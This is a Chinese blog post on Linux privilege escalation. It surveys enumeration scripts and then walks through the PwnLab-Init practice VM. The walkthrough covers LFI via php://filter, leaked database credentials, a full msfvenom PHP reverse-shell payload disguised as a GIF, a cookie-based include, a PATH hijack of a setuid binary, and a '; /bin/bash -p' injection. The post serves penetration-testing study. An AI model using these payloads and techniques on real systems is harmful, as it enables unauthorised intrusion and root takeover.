<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="提权,内网," />





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0" />






<meta name="description" content="记录之前所写的东西">
<meta name="keywords" content="提权,内网">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux提权总结">
<meta property="og:url" content="http://rcoil.me/2016/12/Linux提权总结/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="记录之前所写的东西">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://i1.piimg.com/567571/5fd98d4fdf2d3cec.png">
<meta property="og:image" content="http://i4.buimg.com/567571/2721febf68184c37.png">
<meta property="og:image" content="http://i2.buimg.com/567571/3fb1acd4a8498c29.png">
<meta property="og:image" content="http://i2.buimg.com/567571/582a94652212f727.png">
<meta property="og:image" content="http://i4.buimg.com/567571/3124c142f9f3def3.png">
<meta property="og:image" content="http://i4.buimg.com/567571/cf3e5a249b9ac045.png">
<meta property="og:image" content="http://i4.buimg.com/567571/39cf275ed890575a.png">
<meta property="og:updated_time" content="2017-08-01T15:55:55.451Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux提权总结">
<meta name="twitter:description" content="记录之前所写的东西">
<meta name="twitter:image" content="http://i1.piimg.com/567571/5fd98d4fdf2d3cec.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://rcoil.me/2016/12/Linux提权总结/"/>





  <title> Linux提权总结 | RcoIl的窝 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br />
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://rcoil.me/2016/12/Linux提权总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Linux提权总结
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-12-01T23:09:48+08:00">
                2016-12-01
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/系统安全/" itemprop="url" rel="index">
                    <span itemprop="name">系统安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2016/12/Linux提权总结/" class="leancloud_visitors" data-flag-title="Linux提权总结">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>记录之前所写的东西<br><a id="more"></a></p>
<font color="#DC143C">先来一张图吧。</font>

<p><img src="http://i1.piimg.com/567571/5fd98d4fdf2d3cec.png" alt=""></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>当拥有了一个shell，依然可能会有一些拒绝执行指令的限制，而为了获得目标主机的完整控制权限，则需要在未授权的地方绕过权限控制。</p>
<p>Metasploit 拥有各种不同技术的exploits，能用于目标机器上进行尝试获取系统级权限。除此之外，还有一些在linux下使用的脚本，方便在尝试提升权限的时候处理。通常它们的目的是枚举系统信息而不是给出具体的vulnerabilities/exploits，使用这种类型的脚本将会节省很多时间。</p>
<h2 id="辅助脚本"><a href="#辅助脚本" class="headerlink" title="辅助脚本"></a>辅助脚本</h2><h3 id="LinEnum"><a href="#LinEnum" class="headerlink" title="LinEnum"></a>LinEnum</h3><font color="#FFA07A">可以列举系统设置并且高度总结的linux本地枚举和权限提升检测脚本</font>

<p>作用：</p>
<blockquote>
<p>隐私访问：判断当前用户是否能够用空口令使用sudo命令,root用户的家目录能否访问。</p>
<p>系统信息：主机名，网络详情，当前IP等等。</p>
<p>用户信息：当前用户，列出所有包含uid/gid的用户信息，列出有root权限的用户，检查密码hash是否保存在/etc/passwd。</p>
</blockquote>
<p>下载执行：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">git clone https://github.com/rebootuser/LinEnum.git</div><div class="line">./LinEnum.sh</div></pre></td></tr></table></figure></p>
<p>得出的信息很详细</p>
<h3 id="Linuxprivchecker"><a href="#Linuxprivchecker" class="headerlink" title="Linuxprivchecker"></a>Linuxprivchecker</h3><font color="#FFA07A">由python实现，用来对被控制的系统提供建议的exploits。</font>

<p><a href="http://www.exploit-db.com/search/?action=search&amp;filter_page=1&amp;filter_description=sudo" target="_blank" rel="external">http://www.securitysift.com/download/linuxprivchecker.py</a></p>
<p>这个脚本会枚举文件和目录的权限和内容。<br>这个脚本和LinEnum工作方式一样，只是在关于系统网络和用户方面搜寻相比前者对象的详细。</p>
<h3 id="Linux-Exploit-Suggester"><a href="#Linux-Exploit-Suggester" class="headerlink" title="Linux Exploit Suggester"></a>Linux Exploit Suggester</h3><font color="#FFA07A">基于操作系统的内核版本号。</font>

<p>它是一个不同于以上工具的Perl脚本。使用下列命令下载这个脚本。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git</div></pre></td></tr></table></figure></p>
<p>先使用<code>uname -r</code>来查看内核版本，再使用<code>-k</code>来制定内核版本，然后返回一个包含了可能exploits的列表。</p>
<h3 id="Unix-Privesc-checker"><a href="#Unix-Privesc-checker" class="headerlink" title="Unix-Privesc-checker"></a>Unix-Privesc-checker</h3><font color="#FFA07A">在UNIX系统上检测权限提升向量的shell脚本。</font>

<p>用于寻找那些在未授权用户可以对其他用户或本地应用程序进行提升权限的错误配置。</p>
<p>因为这个脚本是编写的单个shell脚本，所以会比较容易上传和执行，可以被普通用户执行。<br>当它发现一个组可写(group-writable)的文件或目录时，而如果这个组包含了超过一个的非root成员，就会标记出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">git clone https://github.com/pentestmonkey/unix-privesc-check.git</div></pre></td></tr></table></figure></p>
<p>这个用起来有点诡异。</p>
<h2 id="利用linux内核漏洞提权"><a href="#利用linux内核漏洞提权" class="headerlink" title="利用linux内核漏洞提权"></a>利用linux内核漏洞提权</h2><p>本地环境：</p>
<h2 id="利用低权限用户目录下可被Root权限用户调用的脚本提权"><a href="#利用低权限用户目录下可被Root权限用户调用的脚本提权" class="headerlink" title="利用低权限用户目录下可被Root权限用户调用的脚本提权"></a>利用低权限用户目录下可被Root权限用户调用的脚本提权</h2><p>待续。。。。</p>
<h2 id="利用环境变量劫持高权限程序提权"><a href="#利用环境变量劫持高权限程序提权" class="headerlink" title="利用环境变量劫持高权限程序提权"></a>利用环境变量劫持高权限程序提权</h2><h3 id="前戏"><a href="#前戏" class="headerlink" title="前戏"></a>前戏</h3><p>将<code>PwnLab-Init</code>导入VM，在kali操作，使用<code>Netdiscover</code>工具扫描局域网中所有的主机<br><img src="http://i4.buimg.com/567571/2721febf68184c37.png" alt=""></p>
<p>使用nmap扫描<br><img src="http://i2.buimg.com/567571/3fb1acd4a8498c29.png" alt=""><br>发现开了80,3306端口，尝试访问<br>登录和上传页面，登录页面URL结构：/?page=login，看到这个结构，就应该想到是文件包含<br>当我需要知道用户名和密码，我们将使用Nikto的命令找出哪些是它们存储的文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line">root@RcoIl:~# nikto -h 192.168.1.122</div><div class="line">- Nikto v2.1.6</div><div class="line">---------------------------------------------------------------------------</div><div class="line">+ Target IP:          192.168.1.122</div><div class="line">+ Target Hostname:    192.168.1.122</div><div class="line">+ Target Port:        80</div><div class="line">+ Start Time:         2016-12-06 13:11:39 (GMT8)</div><div class="line">---------------------------------------------------------------------------</div><div class="line">+ Server: Apache/2.4.10 (Debian)</div><div class="line">+ The anti-clickjacking X-Frame-Options header is not present.</div><div class="line">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</div><div class="line">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</div><div class="line">+ No CGI Directories found (use &apos;-C all&apos; to force check all possible dirs)</div><div class="line">+ IP address found in the &apos;location&apos; header. The IP is &quot;127.0.1.1&quot;.</div><div class="line">+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is &quot;http://127.0.1.1/images/&quot;.</div><div class="line">+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.</div><div class="line">+ Cookie PHPSESSID created without the httponly flag</div><div class="line">+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.</div><div class="line">+ /config.php: PHP Config file may contain database IDs and passwords.</div><div class="line">+ OSVDB-3268: /images/: Directory indexing found.</div><div class="line">+ OSVDB-3268: /images/?pattern=/etc/*&amp;sort=name: Directory indexing found.</div><div class="line">+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 </div><div class="line">+ OSVDB-3233: /icons/README: Apache default file found.</div><div class="line">+ /login.php: Admin login page/section found.</div><div class="line">+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host</div><div class="line">+ End Time:           2016-12-06 13:11:39 (GMT8) (19 seconds)</div><div class="line">---------------------------------------------------------------------------</div><div class="line">+ 1 host(s) tested</div></pre></td></tr></table></figure>
<p>正如你所看到18行的，<code>/config.php</code>是PHP配置文件，可能包含数据库ID和密码。现在知道文件名，可以使用curl命令来查找该文件中的数据。</p>
<p>使用<code>php://filter/convert.base64-encode/resource=</code>尝试读取<code>index.php</code></p>
<p><img src="http://i2.buimg.com/567571/582a94652212f727.png" alt=""><br>不需要加<code>.php</code>，猜想结构如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;?php if(isset($_GET[&apos;page&apos;]))&#123;</div><div class="line">include($_GET[&apos;page&apos;].&quot;.php&quot;)</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>事实上解密后发现结构就是这样。</p>
<p>读取config.php的内容如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">$server = &quot;localhost&quot;;</div><div class="line">$username = &quot;root&quot;;</div><div class="line">$password = &quot;H4u%QJ_H99&quot;;</div><div class="line">$database = &quot;Users&quot;;</div></pre></td></tr></table></figure></p>
<p>连接数据库去找登录的账号密码<br>kent Sld6WHVCSkpOeQ==     (JWzXuBJJNy)<br>mike U0lmZHNURW42SQ==     (SIfdsTEn6I)<br>kane aVN2NVltMkdSbw==     (iSv5Ym2GRo)</p>
<p>当然也可以读取login和upload，这样就知道结构是怎样的。既然要上传，那看看<code>upload.php</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">session_start();</div><div class="line">if (!isset($_SESSION[&apos;user&apos;])) &#123; die(&apos;You must be log in.&apos;); &#125;</div><div class="line">?&gt;</div><div class="line">&lt;html&gt;</div><div class="line">	&lt;body&gt;</div><div class="line">		&lt;form action=&apos;&apos; method=&apos;post&apos; enctype=&apos;multipart/form-data&apos;&gt;</div><div class="line">			&lt;input type=&apos;file&apos; name=&apos;file&apos; id=&apos;file&apos; /&gt;</div><div class="line">			&lt;input type=&apos;submit&apos; name=&apos;submit&apos; value=&apos;Upload&apos;/&gt;</div><div class="line">		&lt;/form&gt;</div><div class="line">	&lt;/body&gt;</div><div class="line">&lt;/html&gt;</div><div class="line">&lt;?php </div><div class="line">if(isset($_POST[&apos;submit&apos;])) &#123;</div><div class="line">	if ($_FILES[&apos;file&apos;][&apos;error&apos;] &lt;= 0) &#123;</div><div class="line">		$filename  = $_FILES[&apos;file&apos;][&apos;name&apos;];</div><div class="line">		$filetype  = $_FILES[&apos;file&apos;][&apos;type&apos;];</div><div class="line">		$uploaddir = &apos;upload/&apos;;</div><div class="line">		$file_ext  = strrchr($filename, &apos;.&apos;);</div><div class="line">		$imageinfo = getimagesize($_FILES[&apos;file&apos;][&apos;tmp_name&apos;]);</div><div class="line">		$whitelist = array(&quot;.jpg&quot;,&quot;.jpeg&quot;,&quot;.gif&quot;,&quot;.png&quot;); </div><div class="line"></div><div class="line">		if (!(in_array($file_ext, $whitelist))) &#123;</div><div class="line">			die(&apos;Not allowed extension, please upload images only.&apos;);</div><div class="line">		&#125;</div><div class="line"></div><div class="line">		if(strpos($filetype,&apos;image&apos;) === false) &#123;</div><div class="line">			die(&apos;Error 001&apos;); //文件类型必须是image</div><div class="line">		&#125;</div><div class="line"></div><div class="line">		if($imageinfo[&apos;mime&apos;] != &apos;image/gif&apos; &amp;&amp; $imageinfo[&apos;mime&apos;] != &apos;image/jpeg&apos; &amp;&amp; $imageinfo[&apos;mime&apos;] != &apos;image/jpg&apos;&amp;&amp; $imageinfo[&apos;mime&apos;] != &apos;image/png&apos;) &#123;</div><div class="line">			die(&apos;Error 002&apos;); //mime必须是图片类型的</div><div class="line">		&#125;</div><div class="line"></div><div class="line">		if(substr_count($filetype, &apos;/&apos;)&gt;1)&#123;</div><div class="line">			die(&apos;Error 003&apos;);//检测文件类型</div><div class="line">		&#125;</div><div class="line"></div><div class="line">		$uploadfile = $uploaddir . md5(basename($_FILES[&apos;file&apos;][&apos;name&apos;])).$file_ext;</div><div class="line"></div><div class="line">		if (move_uploaded_file($_FILES[&apos;file&apos;][&apos;tmp_name&apos;], $uploadfile)) &#123;</div><div class="line">			echo &quot;&lt;img src=\&quot;&quot;.$uploadfile.&quot;\&quot;&gt;&lt;br /&gt;&quot;;</div><div class="line">		&#125; else &#123;</div><div class="line">			die(&apos;Error 4&apos;);//检测imageinfo</div><div class="line">		&#125;</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>所以，php文件是不能直接上传的，图片上传命名是md5命名。<br><img src="http://i4.buimg.com/567571/3124c142f9f3def3.png" alt=""><br>那我们就绕文件类型，文件内容。<br>直接用msfvenom来生成一个反弹脚本，然后进行尝试。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">root@RcoIl:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.107 lort=4444 -f raw</div><div class="line">No platform was selected, choosing Msf::Module::Platform::PHP from the payload</div><div class="line">No Arch selected, selecting Arch: php from the payload</div><div class="line">No encoder or badchars specified, outputting raw payload</div><div class="line">Payload size: 949 bytes</div><div class="line">/*&lt;?php /**/ error_reporting(0); $ip = &apos;192.168.1.107&apos;; $port = 4444; if (($f = &apos;stream_socket_client&apos;) &amp;&amp; is_callable($f)) &#123; $s = $f(&quot;tcp://&#123;$ip&#125;:&#123;$port&#125;&quot;); $s_type = &apos;stream&apos;; &#125; elseif (($f = &apos;fsockopen&apos;) &amp;&amp; is_callable($f)) &#123; $s = $f($ip, $port); $s_type = &apos;stream&apos;; &#125; elseif (($f = &apos;socket_create&apos;) &amp;&amp; is_callable($f)) &#123; $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) &#123; die(); &#125; $s_type = &apos;socket&apos;; &#125; else &#123; die(&apos;no socket funcs&apos;); &#125; if (!$s) &#123; die(&apos;no socket&apos;); &#125; switch ($s_type) &#123; case &apos;stream&apos;: $len = fread($s, 4); break; case &apos;socket&apos;: $len = socket_read($s, 4); break; &#125; if (!$len) &#123; die(); &#125; $a = unpack(&quot;Nlen&quot;, $len); $len = $a[&apos;len&apos;]; $b = &apos;&apos;; while (strlen($b) &lt; $len) &#123; switch ($s_type) &#123; case &apos;stream&apos;: $b .= fread($s, $len-strlen($b)); break; case &apos;socket&apos;: $b .= socket_read($s, $len-strlen($b)); break; &#125; &#125; $GLOBALS[&apos;msgsock&apos;] = $s; $GLOBALS[&apos;msgsock_type&apos;] = $s_type; eval($b); die();</div></pre></td></tr></table></figure></p>
<p>添加个GIF的文件头，GIF98，文件后缀改为GIF，这样是可以上传的。<br><img src="http://i4.buimg.com/567571/cf3e5a249b9ac045.png" alt=""><br>证明这个gif是我们的shell文件，但是不会解析为PHP。尝试了截断之类的都不行。既然有包含，这个可以通过创建包含图像路径的“lang”的cookie的LFI漏洞，抓包修改cookie为 lang=..//upload/df537fdc576e33db40f6f4295b2ea8a0.gif<br>设置监听。<br><img src="http://i4.buimg.com/567571/39cf275ed890575a.png" alt=""></p>
<h3 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h3><p>得到了一个Meterpreter会话，接下来就是常规的信息收集。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">meterpreter &gt; sysinfo</div><div class="line">Computer    : pwnlab</div><div class="line">OS          : Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686</div><div class="line">Meterpreter : php/linux</div><div class="line">meterpreter &gt; shell</div><div class="line">Process 1325 created.</div><div class="line">Channel 1 created.</div><div class="line">id</div><div class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</div><div class="line">python -c &quot;import pty; pty.spawn(&apos;/bin/bash&apos;)&quot;</div><div class="line">www-data@pwnlab:/var/www/html$ su kane</div><div class="line">su kane</div><div class="line">Password: iSv5Ym2GRo</div><div class="line"></div><div class="line">kane@pwnlab:/var/www/html$ whoami</div><div class="line">whoami</div><div class="line">kane</div><div class="line">kane@pwnlab:/var/www/html$</div></pre></td></tr></table></figure></p>
<p>已经是一个正常用户的一个权限<br>在Kane的home目录下只有一个“msgmike.”文件，用file命令去查看。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">kane@pwnlab:~$ ls</div><div class="line">ls</div><div class="line">msgmike</div><div class="line">kane@pwnlab:~$ file msgmike</div><div class="line">file msgmike</div><div class="line">msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped</div><div class="line">kane@pwnlab:~$ ./msgmike</div><div class="line">./msgmike</div><div class="line">cat: /home/mike/msg.txt: No such file or directory</div></pre></td></tr></table></figure></p>
<p>从上面回显可以看到，这是一个ELF 32位 LSB执行文件，但是当我们执行文件的时候，报错了。<br>通过报错信息我们可以看到msgmike调用cat命令读取/home/mike/msg.txt文件。显然cat的权限不够。<br>针对这种情况，我们可以通过设置bash的$path环境变量来利用，通常的$PATH包含<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">kane@pwnlab:~$ echo $PATH</div><div class="line">echo $PATH</div><div class="line">/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games</div><div class="line">kane@pwnlab:~$ touch cat</div><div class="line">touch cat</div></pre></td></tr></table></figure></p>
<p>然而当调用cat命令的时候，cat会从以上目录来存在，如果我们添加$PATH环境变量，则会先从当前目录来寻找cat指令<br>新建cat，添加执行权限<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">kane@pwnlab:~$ touch cat</div><div class="line">touch cat</div><div class="line">kane@pwnlab:~$ export PATH=.</div><div class="line">export PATH=.</div><div class="line">kane@pwnlab:~$ echo $PATH</div><div class="line">echo $PATH</div><div class="line">.</div><div class="line">kane@pwnlab:~$ echo &quot;/bin/sh&quot; &gt;cat</div><div class="line">echo &quot;/bin/sh&quot; &gt;cat</div><div class="line">kane@pwnlab:~$ /bin/chmod 755 cat</div><div class="line">/bin/chmod 755 cat</div></pre></td></tr></table></figure></p>
<p>这样当我们再次运行./msgmike命令的时候，就会触发当前目录下的cat(/bin/sh)，从而提权。完整的exploit如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">kane@pwnlab:~$ ./msgmike</div><div class="line">./msgmike</div><div class="line">$ whoami</div><div class="line">whoami</div><div class="line">/bin/sh: 1: whoami: not found</div><div class="line">$ /usr/bin/whoami</div><div class="line">/usr/bin/whoami</div><div class="line">mike</div><div class="line">$ pwd</div><div class="line">pwd</div><div class="line">/home/mike</div><div class="line">$ ./msg2root</div><div class="line">./msg2root</div><div class="line">Message for root: ; /bin/bash -p</div><div class="line">; /bin/bash -p</div><div class="line"> </div><div class="line">bash-4.3#id</div><div class="line">id</div><div class="line">uid=1002(mike) gid=1002(mike) euid=0(root) groups=0(root),1003(kane)</div></pre></td></tr></table></figure></p>
<p>看完这篇文章，总会有三个疑问：<br>1、为什么可以使用<br><code>php://filter/convert.base64-encode/resource=</code><br>2、在限制了上传类型，上传内容，为什么可以通过cookie进行包含<br>3、提权的时候 <code>; /bin/bash -p</code>这个是什么意思</p>
<p>其实带着问题去查资料是最好的，要不然是知其然不知其所以然！<br>参考链接：<br><a href="https://en.wikipedia.org/wiki/File_inclusion_vulnerability" target="_blank" rel="external">文件包含漏洞</a><br><a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="external">谈一谈php://filter的妙用</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="https://ooo.0o0.ooo/2017/04/12/58ee21687d335.png" alt="RcoIl WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
